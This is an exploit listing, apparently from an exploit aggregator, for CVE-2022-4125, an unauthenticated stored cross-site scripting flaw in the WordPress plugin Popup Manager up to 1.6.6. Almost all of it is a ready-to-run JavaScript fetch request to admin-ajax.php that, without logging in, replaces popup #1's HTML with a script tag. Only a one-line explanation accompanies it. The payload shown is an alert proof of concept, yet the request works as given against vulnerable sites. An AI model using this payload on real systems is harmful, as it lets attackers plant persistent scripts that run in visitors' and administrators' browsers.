Exploit for Popup Manager <= 1.6.6 - Unauthenticated Stored XSS CVE-2022-4125

## https://sploitus.com/exploit?id=WPEX-ID:7862084A-2821-4EF1-8D01-C9C8B3F28B05
fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=pm_save_data&form_action=update&form_id=1&form_name=vulnerability&form_data={"form_action":"undefined","popup_template":"text","popup_template_style":"","popup_location":"modal-popup","popup_timer":"0","popup_trigger":"timer","popup_entry_animation":"bounce","popup_exit_animation":"bounce","popup_title":"XSS","popup_disclaimer":"Try XSS","popup_text":"vulnerable"}&popup_html=<script>alert("XSS");</script>',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

This exploit script replaces the html of popup #1 with a script tag.